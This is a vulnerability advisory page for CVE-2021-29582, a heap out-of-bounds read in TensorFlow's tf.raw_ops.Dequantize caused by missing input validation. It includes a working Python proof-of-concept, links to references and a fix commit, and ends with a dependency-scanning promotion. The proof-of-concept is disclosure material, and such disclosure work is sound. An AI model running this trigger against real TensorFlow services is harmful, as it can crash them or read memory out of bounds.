CVE-2021-29582: Heap OOB read in `tf.raw_ops.Dequantize`
(updated )
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data:
import tensorflow as tf
input_tensor=tf.constant(
[75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\
-10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\
-10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\
-10, -10, -10, -10], shape=[5, 10], dtype=tf.int32)
input_tensor=tf.cast(input_tensor, dtype=tf.quint8)
min_range = tf.constant([-10], shape=[1], dtype=tf.float32)
max_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32)
tf.raw_ops.Dequantize(
input=input_tensor, min_range=min_range, max_range=max_range, mode='SCALED',
narrow_range=True, axis=0, dtype=tf.dtypes.float32)
References
- github.com/advisories/GHSA-c45w-2wxr-pp53
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-510.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-708.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-219.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-c45w-2wxr-pp53
- nvd.nist.gov/vuln/detail/CVE-2021-29582
Detect and mitigate CVE-2021-29582 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →